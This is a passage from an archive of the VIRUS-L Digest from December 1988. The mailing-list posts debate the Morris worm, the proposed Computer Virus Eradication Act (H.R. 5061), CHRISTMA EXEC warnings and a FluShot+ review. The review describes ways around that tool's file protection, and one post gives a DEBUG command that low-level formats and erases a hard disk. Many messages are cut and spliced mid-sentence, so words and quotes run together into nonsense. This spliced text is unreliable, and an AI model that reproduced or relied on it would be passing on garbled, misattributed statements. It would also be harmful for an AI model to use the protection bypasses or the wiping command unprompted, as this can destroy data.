  808. >>>home can be picked in thirty seconds or less.  However, you won't find
  809. >>>any should have.  Sincerely!
  810. >
  811. >No!  I choose to have open windows on my house and doors that can be
  812. >easily opened and closed.  To argue that I should live in a bank vault
  813. >to avoid the thugs is wrong.  I should live as I choose, and if a thug
  814. >enters and robs, or just enters, he or she is at fault and should be
  815. >delt with.  If my insurance goes up, that is my problem, but your
  816. >right to walk in because I have installed poor or no locks is not
  817. >granted.
  818.  
  819. But if the house would be in a mall or other high pedrestrian
  820. district, people are bound to walk in.  This is a better analogy to
  821. the traffic on internet.  Granted, then it would be by accident but
  822. the house analogy isn't quite right.
  823.  
  824. Chris.
  825.  
  826. *==============================*======================================*
  827. |       Chris A. Bracy         |         Student Consultant           |
  828. |       (215) 758-4141         |  Lehigh University Computing Center  |
  829. |  Kcabrac@Vax1.cc.Lehigh.Edu  |    Fairchild Martindale Bldg.==========================*
  830.  
  831. ------------------------------
  832.  
  833. Date: Sat, 3 Dec 88 14:50 EST
  834. From: Jim Shaffer <SHAFFERJ@BKNLVMS.BITNET>
  835. Subject: FYI: SECURITY has returned
  836.  
  837. In the light of the recent Internet problems (to put it lightly), I thought
  838. that people on this list might be interested in another list which just
  839. re-activated.
  840.  
  841. - --Jim
  842.  
  843. - -----------------------------------------------------------------------------
  844. -
  845. -
  846.  
  847. From:   IN%"security@pyrite.rutgers.EDU"  3-DEC-1988 07:54:54.00
  848. Subj:   The List Returns
  849.  
  850. Sender: SECURITY Digest <SECURITY@UBVM.BITNET>
  851. Reply-to: security@pyrite.rutgers.EDU
  852.  
  853. Yes, you heard it correctly; the Security list is being reactivated
  854. after a long vacation in limbo.  The vax it was being distributed from
  855. got sold off as a doorstop and replaced with this Sun 4/280 [an even
  856. better personal workstation!].
  857.  
  858. [*lots* of stuff deleted]
  859.  
  860. Bitnet recipients can add themselves by sending a message to
  861. LISTSERV@UGA containing
  862.  
  863.     SUBm aim.rutgers.edu to
  864. pyrite.rutgers.edu, if you happened to hear about it via outdated
  865. material.  If you are on a unix site that receives the misc.security
  866. newsgroup, please read the material from there and save network
  867. bandwidth, unless you have some special requirement.  This list is
  868. gatewayed to the newsgroup.
  869.  
  870.     *Hobbit*
  871.     One of several jacks-of-all-trades for LCS at Rutgers
  872.     Security-request@pyrite.rutgers.edu
  873.  
  874. ------------------------------
  875.  
  876. Date:         Sat, 03 Dec 88 14:56:26 EST
  877. From:         "Homer W. Smith" <CTM@CORNELLC>
  878. Subject:      Vested interest in viruses?
  879. To:           virus list <virus-l@lehiibm1>,
  880.               ethics-l@polygraph
  881.  
  882.      Wouldn't it be in the interests of the people who SELL
  883. anti virus software to INVENT and SPREAD viruses so that a demand
  884. would be created for their own software?  Seems like this is
  885. bound to happen.
  886.  
  887.      Homer
  888.  
  889. ------------------------------
  890.  
  891. Date:     Sun, 4 Dec 88 04:32:42 MST
  892. From:     fletch
  893. - ->>home can be picked in thirty seconds or less.  However, you won't find
  894. - ->>any robber arguing that it was the homeowner's fault that he didn't have
  895. - ->>a better lock on the door!
  896. - ->
  897. - ->Even though they probably should have.  Sincerely!
  898. - -
  899. - -No!  I choose to have open windows on my house and doors that can be
  900. - -easily opened and closed.  To argue that I should live in a bank vault
  901. - -to avoid the thugs is wrong.  I should live as I choose, and if a thug
  902. - -enters and robs, or just enters, he or she is at fault and should be
  903. - -delt with.  If my insurance goes up, that is my problem, but your
  904. - -right to walk in because I have installed poor or no locks is not
  905. - -granted.
  906.  
  907.     We all *should* live as we choose.  In reality, criminals deprive us
  908. daily of things ranging from those that will never be missed to those
  909. that are irreplaceable.  I dealt with this by providing superior safeguards
  910. where appropriate.  I hated it.  I also hate rude "gotcha's" every bielong or are welcome.
  911.  
  912. +-----------------------------------------------------------------------------+
  913. ! Walter Reid Fletcher, WB7CJO          Bitnet:  FLETCHER@UWYO                !
  914. ! Vax Facility Manager                           FLETCHER%LODE@UWYO           !
  915. ! Department of Geology and Geophysics           FLETCHER%MOHO@UWYO           !
  916. ! University of Wyoming                +--------------------------------------+
  917. ! Laramie,  WY   82071  1-307-766-6227 ! The aerielly locomotive fowl that    !
  918. !                                      ! exhibits reduced duration hesitation !
  919. ! Internet:  FLETCHER@OUTLAW.UWYO.EDU  ! parameters must realize an enhanced  !
  920. !                                      ! worm procuring scenario.             !
  921. +--------------------------------------+--------------------------------------+
  922.  
  923. ------------------------------
  924.  
  925. Date:  Sun, 4 Dec 88 16:27 EST
  926. From:  Lynn R Grant <Grant@DOCKMASTER.ARPA>
  927. Subject:  Paper virus hits the classifieds
  928.  
  929. The Rethe
  930. Friday, December 3, 1988 edition:
  931.  
  932.    I'M THE PERSONALS Virus.  Please type up an exact copy
  933.    of me and send it in.
  934.  
  935. I trust the editors of The Reader will limit the spread of this one.
  936.  
  937. Lynn R.  Grant Technical Consultant Computer Associates International,
  938. Inc.
  939.  
  940. ------------------------------
  941.  
  942. End of VIRUS-L Digest
  943. *********************VIRUS-L Digest              Monday, 5 Dec 1988          Volume 1 : Issue 33
  944.  
  945. Today's Topics:
  946. Media (virus) humor vs. disinformation
  947. RE: prosecution of Mr. Morris
  948. Computer Virus Eradication Act of 1988
  949. Morris and the worm
  950. Internet Worm report available in ASCII format now
  951. Virus Conference (Arlington, Virginia)
  952.  
  953. ---------------------------------------------------------------------------
  954.  
  955. Date: Mon, 5 Dec 1988 9:41:18 EST
  956. From: Ken van Wyk <luken@spot.CC.Lehigh.EDU>
  957. Subject: Media (virus) humor vs. disinformation
  958.  
  959. This weekend, a friend of mine gave me some political cartoons that he
  960. had found in some publications (I don't know which ones).  The
  961. cartoons were somewhat amusing, but certainly showed that there must
  962. still be quite a lot of confusion in the media as to what a virus even
  963. is.  For example, two robots (which beared no resemblance to, say, a
  964. PUMA robot...) were shown - one says to the other, "Oh, I'll be ok,
  965. it's just a virus that I picked up from a computer."  In another, a
  966. military defense system is shown with a large screen saying something
  967. like:
  968.  
  969. WARNING: INCOMING MISSILES
  970. TARGET:  MIX EGG WHITES UNTIL FLUFFY
  971.  
  972. All the while, two generals are saying, "Must be a virus".  (This
  973. isn't verbatim, but that's the jist of it.)  Also, in a third cartoon,
  974. a computer operator is saying something like, "the vote tallying
  975. computer is infected by a virus, we'll have to hold the election over
  976. again".
  977.  
  978. My reaction - Oh no.
  979.  
  980. Ken
  981.  
  982. ------------------------------
  983.  
  984. Date: Mon, 5 Dec 88 08:18 CDT
  985. From: PETCHER@eg.csc.ti.com
  986. Subject: RE: prosecution of Mr. Morris
  987.  
  988. On the subject of the prosecution of Mr. Morris, and virus
  989. perpetrators in general, a lot has been said regarding the man-hours
  990. required to clean up the mess, and equate that to a dollar cost.
  991. However, nobody has rationalized that equation.  In other words, would
  992. the system maintainers have been doing if they hadn't been getting rid
  993. of the worm?  What was the actual value of computer time lost?  If
  994. schedules were slipped due to computer unavailability, what was the
  995. cost associated with that?  Who were the real money losers?  Granted,
  996. any way you slice the pie, the U.S. government is probably going to
  997. come out the biggest loser, whether it's due to government employees
  998. cleaning up a government owned computer, or contractor employees doing
  999. the same on a cost plus contract.  However, I feel the calculation of
  1000. the actual dollars lost may be a lot more elusive than simply
  1001. multiplying dollars by hours, and in the Morris case could be much
  1002. larger or much smaller than the $20 million estimation being bandied
  1003. about.
  1004.  
  1005. Malcolm Petcher
  1006. Texas Instruments, Inc.
  1007. "The opinions are my own.  The facts are gospel."
  1008.  
  1009. ------------------------------
  1010.  
  1011. Date: Mon, 5 Dec 88 11:11:06 EST
  1012. From: Don Alvarez <boomer@space.mit.edu>
  1013. Subject: Computer Virus Eradication Act of 1988
  1014.  
  1015.     I just received a copy of HR-5061, a new bill being introduced
  1016.     in the House by Wally Herger (R-CA) and Robert Carr (D-Mich.).
  1017.     The text of the bill is included below (see disclaimer).
  1018.  
  1019.     It sounds to me like there are some subscribers to VIRUS-L
  1020.     who's background is more criminal law than computer science,
  1021.     perhaps some of you could help the rest of us out with a little
  1022.     commentary.  Would this bill be helpful to you?  Do you think
  1023.     you would be able to get a conviction with it?  Do you think
  1024.     you would be able to recover your damages with it (and how would
  1025.     you go about defining those damages if you were to use the law)?
  1026.  
  1027.     If people are interested in sending their comments to the
  1028.     authors, I include the name and address of the legislative
  1029.     aide who has been working on this bill.  If people would like
  1030.     to e-mail their comments, you can send them to me and I will
  1031.     mail them to him in a packet (be sure to include your name and
  1032.     normal postal mail adress, as congress isn't on the net).
  1033.  
  1034.                     Happy trails,
  1035.                         Don Alvarez
  1036.                     boomer@SPACE.MIT.EDU
  1037.  
  1038.  
  1039. - ------Start of Bill
  1040.  
  1041. 100th Congress 2D Session                                     H.R. 5061
  1042. To amend title 18, United States Code, to provide penalties for persons
  1043. interfering with the operations of computers through the use of programs
  1044. containing hidden commands that can cause harm, and for other purposes.
  1045.  
  1046. IN THE HOUSE OF REPRESENTATIVES                           July 14, 1988
  1047. Mr. Herger (for himself and Mr. Carr) introduced the following bill;
  1048. which was referred to the Committee on the Judiciary
  1049.  
  1050. A BILL
  1051. To ammend title 18, United States Code, to provide penalties for persons
  1052. interfering with the operations of computers through the use of programs
  1053. containing hidden commands that can cause harm, and for other purposes.
  1054.  
  1055. 1          Be it enacted by the Senate and House of Representa-
  1056. 2    tives of the United States of America in Congress assembled,
  1057. 3    SECTION 1. SHORT TITLE.
  1058. 4          This Act may be cited as the "Computer Virus Eradica-
  1059. 5    tion Act of 1988".
  1060.  
  1061. - -------Page 2
  1062.  
  1063. 1    SECTION 2. TITLE 18 AMENDMENT.
  1064. 2          (a) IN GENERAL.- Chapter 65 (relating to malicious
  1065. 3    mischief) of title 18, United States Code, is amended by
  1066. 4    adding at the end the following:
  1067. 5    "S 1368.  Disseminating computer viruses and other harm-
  1068. 6              ful computer programs
  1069. 7         "(a) Whoever knowingly-
  1070. 8             "(1) inserts into a program for a computer infor-
  1071. 9           mation or commands, knowing or having reason to be-
  1072. 10          lieve that such information or commands will cause
  1073. 11          loss to users of a computer on which such program is
  1074. 12          run or to those who rely on information processed on
  1075. 13          such computer; and
  1076. 14            "(2) provides such a program to others in circum-
  1077. 15          stances in which those others do not know of the inser-
  1078. 16          tion or its effects;
  1079. 17   or attempts to do so, shall if any such conduct affects
  1080. 18   interstate or foreign commerce, be fined under this title or
  1081. 19   imprisoned not more than 10 years, or both.
  1082. 20        "(b) Whoever suffers loss by reason of a violation of
  1083. 21   subsection (a) may, in a civil action against the violator,
  1084. 22   obtain appropriate relief.  In a civil action under this section,
  1085. 23   the court may award to the prevailing party a reasonable attor-
  1086. 24   ney's fee and other litigation expenses.".
  1087.  
  1088. - --------Page 3
  1089.  
  1090. 1         (b) CLERICAL AMENDMENT.- The table of sections at
  1091. 2    the begining of chapter 65 of title 18, United States Code,
  1092. 3    is amended by adding at the end the following:
  1093.   "1368. Disseminating computer viruses and other harmful computer programs.".
  1094.  
  1095. - --------End of Bill
  1096.  
  1097. >>>>NOTE: The above text was typed in by hand from a printed copy of HR5061
  1098. >>>>      received from Mr. Herger's office.  I have no experience with
  1099. >>>>      legal docu>>      errors which could affect the nature of the bill.  Neither
  1100. >>>>      I nor my employer (MIT Center for Space Research) make any claims
  1101. >>>>      as to the accuracy of the text.  For an official copy of the
  1102. >>>>      bill, please contact:
  1103. >>>>
  1104. >>>>                Mr. Doug Riggs
  1105. >>>>                1108 Longworth Bldg
  1106. >>>>                Washington D.C.  20515
  1107.  
  1108.      + ----------------------------------------------------------- +
  1109.      |   Don Alvarez               MIT Center For Space Research   |
  1110.      |   boomer@SPACE.MIT.EDU      77 Massachusetts Ave   37-618   |
  1111.      |   (617) 253-7457            Cambridge, MA 02139             |
  1112.      + ----------------------------------------------------------- +
  1113.  
  1114. ------------------------------
  1115.  
  1116. Date: Mon, 5 Dec 88 14:01:15 CST
  1117. From: Kevin Trojanowski <troj@umaxc.weeg.uiowa.edu>
  1118. Subject: Morris and the worm
  1119.  
  1120. Something I've noticed in the many notes present within this group --
  1121. most, if not all, of them discuss the Novemberm, or
  1122. has been convicted beyond a reasonable doubt.  Let us remember that in
  1123. this country, it's innocent until proven guilty, not guilty as soon as
  1124. the FBI arrests you.
  1125.  
  1126. If you've not read the Worm analysis, I suggest doing so.  It provides
  1127. an interesting insight into the possibility that Morris may not have
  1128. written the worm, or may not have done so alone.  It cites examples of
  1129. poor coding, inconsistent coding, and poor algorithmic use.
  1130.  
  1131. - -Kevin Trojanowski
  1132.  troj@umaxc.weeg.uiowa.edu
  1133.  
  1134. ------------------------------
  1135.  
  1136. Date: Mon, 5 Dec 1988 15:43:52 EST
  1137. From: Ken van Wyk <luken@spot.CC.Lehigh.EDU>
  1138. Subject: Internet Worm report available in ASCII format now
  1139.  
  1140. A hearty thanks to Len Levine who has (painstakingly, no doubt) taken
  1141. the PostScript file of Gene Spafford's report on the Internet worm and
  1142. converted it to straight ASCII text (well, PostScript is ASCII, but
  1143. not very readable to most of us...)!
  1144.  
  1145. So, my U.S. mail distribution of the file can now include eitherk (360k or 1.2 meg MS-DOS),
  1146. and I'll mail it back to you.  If you want both the PS and the DOC
  1147. file, send two 360k disks or one 1.2 meg disk.  Oh yeah, first e-mail
  1148. me a request for my postal address.
  1149.  
  1150. Thanks again, Len!
  1151.  
  1152. Ken
  1153.  
  1154. ------------------------------
  1155.  
  1156. From: gateh@conncoll.bitnet
  1157. Date: Mon, 5 Dec 88 16:16:54 est
  1158. Subject: Virus Conference (Arlington, Virginia)
  1159.  
  1160. A flyer about a virus conference just came across my desk, and I was
  1161. wondering if anyone else has heard about it and is considering
  1162. attending.  Entitled "Preventing and Containing Computer Virus
  1163. Attacks", it takes place January 30-31, in Arlington, VA.  Speakers
  1164. include Representative Wally Herger (R-CA), a special agent from the
  1165. FBI, John Landry (ADAPSO virus committee chairman), Patricia Sission
  1166. from NASA, as well as a collection of attorneys and business folk.
  1167. Conference is chaired by Dave Douglass, no info provided.
  1168.  
  1169. Have you heard anything about any of these people?  Or any info that
  1170. would help     4550 Montgomery Avenue
  1171.         Suite 700N
  1172.         Bethesda, MD   20814-3382
  1173.  
  1174.  
  1175. I've had such mixed success with seminars and conferences that I tend to
  1176. get jumpy when I see one that I might want to attend.
  1177.  
  1178. - - Gregg
  1179.  
  1180. ___________________________________________________________________________
  1181. Gregg TeHennepe                        | BITNET:  gateh@conncoll
  1182. Minicomputer Specialist                | Phone:   (203) 447-7681
  1183. Academic Computing and User Services
  1184. Connecticut College
  1185. New London, CT   06320
  1186.  
  1187. ------------------------------
  1188.  
  1189. End of VIRUS-L Digest
  1190. *********************VIRUS-L Digest              Tuesday, 6 Dec 1988         Volume 1 : Issue 34
  1191.  
  1192. Today's Topics:
  1193. Morris' Criminality
  1194. Re: Low-level hard disk format (PC)
  1195. CHRISTMA EXEC [IBM VM/CMS] has reappeared!
  1196. Virus Eradication Bill
  1197.  
  1198. ---------------------------------------------------------------------------
  1199.  
  1200. Date: 5 December 1988, 15:08:38 CDT
  1201. From: Nicholas Geovanis      312-996-0590         UWC6NTG  at UICVMC
  1202. Subject: Morris' Criminality
  1203.  
  1204. Si Morris' actions and other criminal or
  1205. semi-criminal activities, but all have missed an important point.
  1206. Regardless of the exact state of the law, if a law enforcement officer
  1207. witnesses a person disturbing the public's peace in any manner, that
  1208. officer may detain that person, and that person may be prosecuted and
  1209. punished in any manner that is not inconsistent with the law.
  1210.  
  1211. There is little disagreement that Morris disturbed the "public
  1212. peace,".  although there are varying estimates of precisely how big
  1213. the disturbance was. So far, he has not been reprimanded in the least.
  1214. But if the guys down the block want to have some beers and whoop-it-up
  1215. around 3 am., maybe play football in the park, the chances are good
  1216. that they'll spend an evening in the lockup, since drinking in public
  1217. is illegal, even though it's a victimless crime in itself, and since
  1218. the park closes officially at 11 pm.  It's even more likely that a
  1219. teenager who steals $40 from a person who can afford the los he may even be idolized
  1220. rather than prosecuted. Do you get the point? There's yet another
  1221. massive double standard at work here. If you steal another person's.
  1222. money (in the form of time or goods, and regardless of whether or not
  1223. you use it for your own benefit), whether or not you're punished
  1224. depends on how sophisticated your thievery was. If you're clever like
  1225. Morris, you may get away with it. If you aren't, and your tool is a
  1226. knife instead of a terminal, hope that you don't get caught.
  1227.  
  1228.            Nick Geovanis, UWC6NTG at UICVMC
  1229.                    Sysprog
  1230.                U of Ill Admin Comp Ctr
  1231.                  Chicago, Ill
  1232.  
  1233. [Ed. Nick, you sent this file to me as (presumably) an IBM SENDFILE
  1234. from some IBM mainframe.  ASCII machines (like the one that I'm on)
  1235. don't deal with these well; they turn end-of-lines into { brackets,
  1236. etc.  It takes me quite a bit of work to convert everything back into
  1237. a readable format (anyone know if there's a GNU EMACS function to do
  1238. this?), and I won't always have the time to do that (read: anyone
  1239. sending mail in SENDFILE format (is that the correct term?)  shouldn't
  1240. be surprised if their messages don't make it into the digest).  Please
  1241. send mail as "normal" mail that the ASCII world can read properly.
  1242. Thanks.
  1243.  
  1244. While I'm on the subject of appropriate submission formats, I'd like
  1245. to ask people to *please* include an appropriate SUBJECT line.  A
  1246. subject of "Re: VIRUS-L Digest V#1 I#27" is *not* an appropriate
  1247. subject.  I realize that the recent digesting of VIRUS-L is the cause
  1248. of this, but we still need decent subjects.  Here, too, I may not
  1249. always have the time to make up a subject for the person sending the
  1250. message in...  I'd appreciate everyone's help on this.
  1251. Ken]
  1252.  
  1253. ------------------------------
  1254.  
  1255. Date:         Mon, 05 Dec 88 20:45:37 ECT
  1256. From:         Ken Hoover <BG1838@BINGVMA.BITNET>
  1257. Subject:      Re: Low-level hard disk format (PC)
  1258.  
  1259.    A Low-level format/restructuring of the disk is a lot closer than
  1260. you may think.
  1261.  
  1262.    To activate the low-level formatter that resides in your hard disk
  1263. controller (this is for Western Digital controllers), get into DEBUG,
  1264. and type
  1265.  
  1266.        g=C800:5
  1267.  
  1268.    This will invoke the low-level formatter, and just follow the
  1269. prompts.  There are also commercial programs (ONTRAX comes to mind)
  1270. that are designed to accomodate different disk drives.
  1271.  
  1272.    Remember to map the hard error locations onto the disk when you are
  1273. prompted to.  This is VERY important (I know, the company I got my PC
  1274. from forgot to do this, and I spent three months fighing disk errors
  1275. until I found out what was really wrong).  There should be a list of
  1276. hard errors attached to your drive (usually a sticker on top of the
  1277. case), or they may be on a separate sheet which came with the unit.
  1278.  
  1279.    Don't EVER do this unless it's the ONLY solution (try everything
  1280. else first) because this is a LAST RESORT.  This is the hard disk
  1281. equivilant of atomic warfare against errors/viruses.
  1282.  
  1283.    Good luck!
  1284.                                         - Kenneth J. Hoover
  1285.  
  1286. UG Consulant
  1287. T.J. Watson School of Engineering
  1288. SUNY Binghamton
  1289. Binghamton, NY, USA.
  1290. BG1838@BINGVMA
  1291.  
  1292. ------------------------------
  1293.  
  1294. Date: Mon, 5 Dec 88 22:24 EST
  1295. From: Jim Shaffer <SHAFFERJ@BKNLVMS.BITNET>
  1296. Subject: CHRISTMA EXEC [IBM VM/CMS] has reappeared!
  1297.  
  1298. This turned up on, of all places, GAMES-L, and while our VAX is immune
  1299. to it, I witnessed what it did to BITNet last year and don't wish to
  1300. see it again.
  1301.  
  1302. This "virus", for those of you not familiar with it, is a program that
  1303. purports to draw a Christmas card on your screen.  It does just that,
  1304. but also searches your account for names and addresses and mails
  1305. itself to all found.  It is written in REXX, an easily human-readable
  1306. language, and thus is only run (theoretically) by very stupid users.
  1307. Unfortunately, there seemed to be a lot of those around last year.
  1308. Maybe it was final exams draining people's brainpower :-)
  1309.  
  1310. If I remember rightly, someone eventually circulated an altered
  1311. version that also erased your disk for you.  Or maybe that was the
  1312. original, and it was altered not to erase later.  In any event, the
  1313. effects on BITNet are disastrous if, for some reason, lots of people
  1314. run it without looking at it.
  1315.  
  1316. - --Jim
  1317.  
  1318. - -----------------------------------------------------------------------------
  1319. -
  1320. -
  1321.  
  1322. To all those getting this note:
  1323.  
  1324. The Christmas Exec virus has been released on the BitNet system once
  1325. again!
  1326.  
  1327. This sneaky program has been spotted here at the Univ of Arkansas
  1328. several times. If you have seen this elusive program, please delete it
  1329. from your reader before execution. It has been the major cause of
  1330. BitNet problems{ in the past.
  1331.  
  1332. Just a warning (flame me, and I swear...)
  1333.  
  1334. Dave Boddie
  1335. *************************************************************************
  1336. David Boddie            |   "If you hear thunder, don't worry, the light-
  1337. Remote4 Operator        |ning hit somethin else!"
  1338. Computing Services      |   "M00seMan...With the propotionate strength,
  1339. University of Arkansas  |intelligence, and wisdom of a M00se. Bl00p...
  1340. Fayetteville, Arkansas  |there he goooeeesss!"
  1341. (501)575-2908           |
  1342.  
  1343. ------------------------------
  1344.  
  1345. Date:         Tue, 06 Dec 88 01:50:09 EST
  1346. From:         Steve <XRAYSROK@SBCCVM>
  1347. Subject:      Virus Eradication Bill
  1348.  
  1349. First, I think it would have been useful to have had a copy of the
  1350. bill which was being amended so that we could have the complete
  1351. picture.  Second, I think some definitions might be in order.  What
  1352. does the word 'insert' imply?  Do I have to have an ordinary program
  1353. to start with before I can 'insert' something into it, or can I write
  1354. my own malicious program from scratch and then name it something
  1355. familiar like 'Startrek' or 'WordStar' (and still be subject to this
  1356. law)?  Did the Internet Worm Program insert code into another program
  1357. (I'm wondering if this amendment is somehow supposed to be a reaction
  1358. to the Worm)?  I don't think it did, unless you want to count the act
  1359. of running a program as inserting commands into a program (the
  1360. operating system).  (Or maybe we should count the use of a program
  1361. like the editor, presumably used to write the malicious code; that's
  1362. not what the bill intends, but it's stated ratherly vaguely).  I do
  1363. like the qualifier 'malicious' because I think intent is important,
  1364. but although the bill uses the word 'malicious' in its title, it
  1365. actually says nothing about the actual intent of the harmful-code
  1366. writer.  I like it that the bill protects those who unknowingly spread
  1367. a virus.  On the other hand, the amendment makes it sound as though
  1368. somebody can *knowingly* spread a virus, but if they didn't write it,
  1369. they're safe from prosecution.
  1370.  
  1371. Steven C. Woronick
  1372. Physics Dept.
  1373. SUNY at Stony Brook
  1374. Stony Brook, NY 11790-3800
  1375. Disclaimer:  These opinions are solely my own.
  1376. Acknowledge-To: <XRAYSROK@SBCCVM>
  1377.  
  1378. ------------------------------
  1379.  
  1380. End of VIRUS-L Digest
  1381. *********************VIRUS-L Digest              Tuesday, 6 Dec 1988         Volume 1 : Issue 35
  1382.  
  1383. Today's Topics:
  1384. FSP; Hardcard problem (PC)
  1385. Re: Computer Virus Eradication Act of 1988
  1386. Did Morris write it all?
  1387. RE: media (virus) humor vs. disinformation
  1388. Christma Exec (IBM VM/CMS)
  1389. BINHEX 4.0 and Stuffit ... URGENT ...!!!
  1390. making amends
  1391. Internet report (ASCII version) avail. for anon. FTP
  1392.  
  1393. ---------------------------------------------------------------------------
  1394.  
  1395. Date:        Tue,  06 Dec 88 15:59:23 +0200
  1396. From:        Y. Radai <RADAI1@HBUNOS>
  1397. Subject:     FSP; Hardcard problem (PC)
  1398.  
  1399.   Paul Coen asked for opinions on (1) FluShot+ 1.4 and (2) the inability
  1400. to access a hard card when booting from a DOS 2.11 floppy.
  1401.  
  1402.   FLU_SHOT+
  1403.   ---------
  1404.   I have been using FSP (FLU_SHOT+) 1.4 for several weeks.  (Previously
  1405. I used Version 1.2.)  The first experiment I tried was to infect an FSP-
  1406. protected computer with the Israeli virus.  FSP prevented the virus from
  1407. installing itself in RAM and notified me of the attempt.  It also warns
  1408. me of all attempts to format disks.  In these two senses the program
  1409. seems to be quite effective.
  1410.   When I tried to write-protect a file using the P option, I found that
  1411. it worked well against attempts to write directly to the file, but that
  1412. there was an easy way of getting around the write protection: create a
  1413. new file containing the desired information, delete or rename the ori-
  1414. ginal file, then rename the new file to the original name.
  1415.   Similarly, the read-protection on a given file can be circumvented by
  1416. renaming the file.
  1417.   The checksum feature is quite fast.  However, it is basically insecure
  1418. since the checksum for any given file is the same for all users.  Also,
  1419. the files which are to be checksummed must be specified individually by
  1420. the user since wildcard notation is not allowed with the C option.
  1421. Particularly annoying is the fact that instead of the program recording
  1422. the checksums automatically, the user is forced to enter each checksum
  1423. manually into the file containing the filenames, after first running
  1424. the program with dummy checksums in that file and writing down each
  1425. "correction" displayed by the program.  Finally, there is no provision
  1426. for "static" checksumming, i.e. you can't ask for checksumming whenever
  1427. you feel like it (unless you use something like MARK/RELEASE to get rid
  1428. ofvery now and then, for no apparent reason, I get a mes-
  1429. sage from FSP saying "CMOS has been changed!".  I reply "Y" and the
  1430. message usually goes away with no apparent ill effects.  However, some-
  1431. times I can't get rid of the message (along with a non-stop buzzing
  1432. sound and inability to continue working) without re-booting.
  1433.   By the way, although the documentation doesn't mention it, I found
  1434. that FSP didn't work properly when the value of FILES in the CONFIG.SYS
  1435. file was 10 or less (the default is 8).
  1436.   A final point is that a program like FSP can be neutralized by a virus
  1437. or Trojan which looks for it in memory and temporarily diverts inter-
  1438. rupts hooked by the program until it has finished its dirty work.
  1439. Another way of circumventing such a program might be to issue commands
  1440. directly to the h.d. controller, provided it can be determined which
  1441. controller is being used.
  1442.  
  1443.   Accessing hard disks when booting from diskettes
  1444.   ------------------------------------------------
  1445. sk whether a hard disk can
  1446. be made inaccessible even when booting from a DOS 3.xx diskette.  The
  1447. answer is definitely yes, since it's a fact that PC-Lock does that.
  1448. And I'm fairly certain that the way it does it is by modifying the
  1449. partition table to make the DOS partition seem non-DOS even to 3.xx,
  1450. and correcting for this when booting from the hard disk by means of a
  1451. special device driver.
  1452.  
  1453.                                            Y. Radai
  1454.                                            Hebrew Univ. of Jerusalem
  1455.  
  1456. ------------------------------
  1457.  
  1458. Date: 6 December 1988, 09:42:26 EST
  1459. From: David M. Chess                                 CHESS    at YKTVMV
  1460. Subject: Re: Computer Virus Eradication Act of 1988
  1461.  
  1462. Interesting stuff!  Nice that our legislators are thinking about it.
  1463. A few points:
  1464.  
  1465.   - It really ought to be the "Trojan Horse Eradication Act", since
  1466.     it covers the silly erase-all-files-and-print-"gotcha" programs
  1467.     that infants write and post to BBSs under atuses.
  1468.  
  1469.   - Would it cover the Internet worm?   I'm not sure in what sense
  1470.     the author of the worm program "provided" it "to others".  Not
  1471.     *human* others, anyway.
  1472.  
  1473.   - Would it cover a virus that spread, but did no intentional
  1474.     damage?   For instance, the Mac virus that (was supposed to)
  1475.     just put up a "message of peace" and then delete itself.  Rumor
  1476.     says that it did do some unintentional damage if run on the
  1477.     wrong sort of system.  This law, though, seems intended only
  1478.     to cover actions analogous to vandalism, rather than those
  1479.     analogous to unlawful entry.
  1480.  
  1481. DC
  1482. Watson Research
  1483. * No one but me has any idea that I'm posting this
  1484.  
  1485. ------------------------------
  1486.  
  1487. Date:    Tue, 06 Dec 88 10:57 EST
  1488. From:    "Scott P Leslie" <UNCSPL@UNC.BITNET>
  1489. Subject: Did Morris write it all?
  1490.  
  1491. Hi,
  1492.    This regards the possibility that Morris did not actaully write
  1493. all (or even any) of the Internet worm.  You can't really go by coding
  1494. style and content in s are hastily done and don't nearly show of your
  1495. programming ability.  Also, Morris supposeedly wasn't finished with
  1496. the worm program and was just testing it a bit.  While the programming
  1497. style seems to indicate that other people should be investigated
  1498. to see if they help create the program, it "style" doesn't really
  1499. mean much.
  1500.    Also, other people could have worked on the project but not been
  1501. in on the "release" of the worm.  What do the lawyers out there
  1502. say to their liability?
  1503. .
  1504. Scott P. Leslie (UNCSPL@UNC)                                Jax
  1505. Note: The University of North Carolina does not support my comments!
  1506.  
  1507. ------------------------------
  1508.  
  1509. Date: Tue, 6 Dec 88 09:45 EST
  1510. From: "$CAROL@OBERLIN (BITNET)" <$CAROL%OCVAXC@OBERLIN.BITNET>
  1511. Subject: RE: media (virus) humor vs. disinformation
  1512.  
  1513. Oh, c'mon now...that first cartoon is from the NEW YORKER; I've cut it
  1514. out and taped it to my office door.  If you've seen enough of their
  1515. other "drawings" (as they like to call t used by the masses is part of
  1516. the humor.
  1517.  
  1518.         |  Carol Conti-Entin   (216) 775-8290
  1519.         |  $carol@oberlin   -or-   pconti@oberlin  (BITNET)
  1520.         |  Academic Computing Consultant
  1521.         |  Houck Computing Center
  1522.         |  Oberlin College
  1523.         |  Oberlin, OH  44074
  1524.  
  1525. ------------------------------
  1526.  
  1527. Date:    Tue, 6 Dec 88 12:53 EST
  1528. From:     <JEB107@PSUVM>
  1529. Subject:  Christma Exec (IBM VM/CMS)
  1530.  
  1531. The following message came across the Joke-L List today.  I don't know
  1532. if this information has already been posted to this list (I am a
  1533. recent subscriber) but I thought it might be useful.  Happy hunting.
  1534.  
  1535. Jon Baker {JEB107 at PSUVM)
  1536.  
  1537.  
  1538.   - - The original note follows - -
  1539.  
  1540. Date:         Mon, 5 Dec 88 13:30:02 CST
  1541. Sender:       "Funny Jokes, Funny Stories" <JOKE-L@TRITU>
  1542. From:         Paul Heroy <HEROY@LSUVM>
  1543. Subject:      VIRUS WARNING
  1544.  
  1545. WARNING ABOUT CHRISTMA EXEC!!!!!!!
  1546.  
  1547. LSU, unfortunately, has been hit by the CHRISTMA EXEC and a few copies
  1548. sent out bms, and accesses NAMES, NOTEBOOK, and NETLOG files
  1549. in its search for ids/nodes. I may have inadvertently posted this
  1550. program on the Joke List - my apologies for this and any inconviences
  1551. caused.  If you get a copy of this, purge it.
  1552.  
  1553. Thanks,
  1554. Paul Heroy
  1555. Computer Analyst
  1556. Louisiana State University
  1557.  
  1558. ------------------------------
  1559.  
  1560. Date:     Tue Dec 06 15:13:26 1988
  1561. From:     Pedro Sepulveda J. <PSEPULVE@USACHVM1>
  1562. Subject:  BINHEX 4.0 and Stuffit ... URGENT ...!!!
  1563.  
  1564.     Hi Networkers...!
  1565.  
  1566.               We need Binhex 4.0 and  Stuffit... If you have this
  1567.     programs... Send us please... We need it's very urgently...!
  1568.  
  1569.               Thanks a lots...
  1570.  
  1571. Viral Investigation Group
  1572. Universidad de Santiago de Chile
  1573.  
  1574. ------------------------------
  1575.  
  1576. Date:     Tue, 6 Dec 88 14:41:01 EST
